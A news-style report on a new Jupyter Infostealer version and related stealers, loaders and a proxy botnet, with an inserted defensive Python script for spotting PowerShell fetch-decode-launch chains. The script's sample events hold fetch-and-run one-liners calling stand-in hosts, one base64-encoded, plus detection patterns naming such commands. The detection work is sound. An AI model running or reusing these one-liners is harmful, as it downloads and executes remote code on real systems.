
Advanced Stealth Techniques in the New Jupyter Infostealer Version


An updated version of the Jupyter information-stealing malware has resurfaced with "simple yet impactful changes" intended to quietly compromise infected systems and establish persistence.


In a report shared with The Hacker News, VMware Carbon Black researchers stated, "The team has discovered new waves of Jupyter Infostealer attacks which leverage PowerShell command modifications and signatures of private keys in attempts to pass off the malware as a legitimately signed file."


Also going by the names Polazert, SolarMarker, and Yellow Cockatoo, Jupyter Infostealer has a history of using malvertising and manipulative search engine optimisation (SEO) techniques as an initial access vector to fool people looking for popular software into downloading it from questionable websites.


It can harvest credentials and establish encrypted command-and-control (C2) communication, which it uses to exfiltrate data and execute arbitrary commands.


The most recent set of artefacts is signed with a variety of certificates to lend the malware a false air of legitimacy; once a victim runs one of the bogus installers, it kicks off the infection chain.


The installers are designed to launch a temporary payload that uses PowerShell to connect to a remote server, decode the stealer malware, and then launch it.
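The chain described above (reach a remote server, decode a payload, launch it) is what a PowerShell Script Block Logging feed is well placed to surface. The following Python triage script is an added example, not code from the article or from VMware Carbon Black: it scans constructed script-block text for indicators of each stage, unpacks any -EncodedCommand argument so indicators hidden inside it are scored too, and flags only events that combine a remote fetch with a decode or launch step, so that a plain software download does not fire on its own. The field names and sample events are assumptions, and the constructed remote addresses use RFC 5737 documentation ranges.

```python
"""Triage PowerShell script-block events for the fetch -> decode -> launch
chain. Added example with constructed sample data; not the article's code."""
import base64
import re
from typing import Dict, List

# Indicator groups, one per stage of the chain the article describes, plus the
# usual "run quietly" switches. Matched case-insensitively.
STAGES: Dict[str, List[str]] = {
    "remote_fetch": [r"Net\.WebClient", r"DownloadString", r"DownloadFile",
                     r"Invoke-WebRequest", r"\biwr\b", r"Invoke-RestMethod", r"https?://"],
    "decode":       [r"FromBase64String", r"-EncodedCommand", r"-enc\b",
                     r"GzipStream", r"DeflateStream", r"Decompress"],
    "launch":       [r"Invoke-Expression", r"\biex\b", r"Start-Process",
                     r"\[Reflection\.Assembly\]::Load"],
    "hide":         [r"-w(?:indowstyle)?\s+hidden", r"-nop\b", r"-noprofile",
                     r"-ep\s+bypass", r"-executionpolicy\s+bypass"],
}
COMPILED = {stage: re.compile("|".join(pats), re.IGNORECASE) for stage, pats in STAGES.items()}

# -EncodedCommand / -enc / -e take a base64 blob of UTF-16LE text.
ENC_RX = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def expand_encoded(script: str) -> str:
    """Append the plaintext of any encoded-command argument to the script text."""
    extra = []
    for m in ENC_RX.finditer(script):
        try:
            extra.append(base64.b64decode(m.group(1)).decode("utf-16le", errors="replace"))
        except ValueError:  # not valid base64; leave the raw text to the regexes
            continue
    return script + "\n" + "\n".join(extra)


def stages_hit(script: str) -> List[str]:
    """Return the stage names whose indicators appear in the (expanded) script."""
    text = expand_encoded(script)
    return [stage for stage, rx in COMPILED.items() if rx.search(text)]


def is_suspicious(hit: List[str]) -> bool:
    """Require the chain, not a lone indicator: admins download and decode too."""
    return "remote_fetch" in hit and ("decode" in hit or "launch" in hit)


def triage(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Score each event; 'host' and 'script' are assumed field names."""
    results = []
    for ev in events:
        hit = stages_hit(ev["script"])
        results.append({"host": ev["host"], "stages": hit, "suspicious": is_suspicious(hit)})
    return results


# Constructed sample events (assumed shape, loosely modelled on Event ID 4104).
_INNER = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/stage')"
_ENC = base64.b64encode(_INNER.encode("utf-16le")).decode("ascii")
SAMPLE_EVENTS = [
    {"host": "ws-01", "script": r"Get-ChildItem C:\Users | Sort-Object Length"},
    {"host": "ws-02", "script": r"Invoke-WebRequest -Uri https://updates.example.com/tool.msi -OutFile C:\Temp\tool.msi"},
    {"host": "ws-03", "script": "powershell -nop -w hidden -c \"$d=(New-Object Net.WebClient)"
                                ".DownloadString('http://198.51.100.7/x');"
                                "IEX([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($d)))\""},
    {"host": "ws-04", "script": f"powershell.exe -EncodedCommand {_ENC}"},
]

if __name__ == "__main__":
    for row in triage(SAMPLE_EVENTS):
        print(row)
```

The rule in `is_suspicious` is deliberately conservative; in a real deployment the stage hits would feed a score alongside parent-process and signer context rather than act as a standalone verdict.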



The development reflects how stealer malware sold on the dark web keeps acquiring new tactics and techniques that lower the barrier to entry for less skilled actors.


Lumma Stealer has also been updated, adding a loader and the capability to create builds at random for enhanced obfuscation.


"This takes the malware from being a stealer type to a more devious malware that can load second-stage attacks on its victims," VMware stated. "The loader provides a way for the threat actor to escalate its attack from data theft to anything up to infecting its victims with ransomware."


Mystic Stealer is another family of stealer malware that has been steadily improving; in addition to its information-stealing capabilities, it has recently incorporated a loader functionality.


Jupyter Infostealer

"The code continues to evolve and expand the data theft capabilities and the network communication was updated from a custom binary TCP-based protocol to an HTTP-based protocol," Zscaler reported at the end of November.


"The new modifications have led to increased popularity with criminal threat actors leveraging its loader functionality to distribute additional malware families including RedLine, DarkGate, and GCleaner."


The emergence of stealers and remote access trojans such as Akira Stealer and Millenium RAT, which come equipped with multiple functionalities to enable data theft, is another example of how this class of malware is constantly evolving.



The revelation coincides with reports that malware loaders such as PrivateLoader and Amadey have been seen infecting hundreds of computers with the Socks5Systemz proxy botnet, which has been active since 2016.


Bitsight, a cybersecurity company, disclosed information about the service last week and claimed to have located at least 53 botnet-related servers spread around France, Bulgaria, the Netherlands, and Sweden.


The campaign's ultimate objective is to turn compromised systems into proxies that route traffic for other actors, legitimate or not, in order to provide an extra layer of anonymity. Given the absence of infections in Russia, the threat actors are believed to be of Russian origin.


"The proxy service allows clients to choose a subscription ranging from $1 USD to $4,000 USD, payable in full using cryptocurrency," said Bitsight. "Based on network telemetry analysis, it is estimated that this botnet has approximately 10,000 infected systems with victims spread across the globe."
